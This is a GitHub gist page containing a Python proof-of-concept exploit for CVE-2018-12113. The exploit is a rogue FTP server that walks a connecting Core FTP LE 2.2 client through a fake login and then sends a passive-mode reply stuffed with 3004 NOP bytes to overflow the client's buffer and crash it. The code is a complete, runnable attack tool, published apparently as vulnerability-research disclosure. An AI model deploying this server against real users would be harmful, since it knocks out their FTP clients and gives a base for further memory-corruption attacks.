Last active
June 29, 2018 13:44
Star
You must be signed in to star a gist
PoC for CVE-2018-12113
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# coding: utf-8 | |
############ Description: ########## | |
# The vulnerability was discovered during a vulnerability research lecture. | |
# This is meant to be a PoC. | |
#################################### | |
# Exploit Title: Core FTP LE v2.2 Build 1921 (Client) - Buffer Overflow PoC | |
# Date: 12 Jun 2018 | |
# Exploit Author: Berk Cem Göksel | |
# Contact: twitter: @berkcgoksel || bgoksel.com | |
# Vendor Homepage: http://www.coreftp.com/ | |
# Software Link: http://www.coreftp.com/download | |
# Version: Core FTP Client LE v2.2 Build 1921 | |
# Tested on: Windows 10 | |
# Category: Dos | |
# CVE : CVE-2018-12113 | |
import socket | |
IP = '0.0.0.0' | |
port = 21 | |
Stack_beginning = 3004 | |
buff = "\x90" * (3004) | |
try: | |
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
s.bind((IP, port)) | |
s.listen(20) | |
print("[i] FTP Server started on port: "+str(port)+"\r\n") | |
except: | |
print("[!] Failed to bind the server to port: "+str(port)+"\r\n") | |
while True: | |
conn, addr = s.accept() | |
conn.send('220 Welcome!' + '\r\n') | |
print conn.recv(1024) | |
conn.send('331 OK.\r\n') | |
print conn.recv(1024) | |
conn.send('230 OK.\r\n') | |
print conn.recv(1024) | |
conn.send('215 UNIX Type: L8\r\n') | |
print conn.recv(1024) | |
conn.send('257 "/" is current directory.\r\n') | |
print conn.recv(1024) | |
conn.send('227 Entering Passive Mode (' + buff + ')\r\n') | |
print conn.recv(1024) | |
conn.send('257' + '\r\n') |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment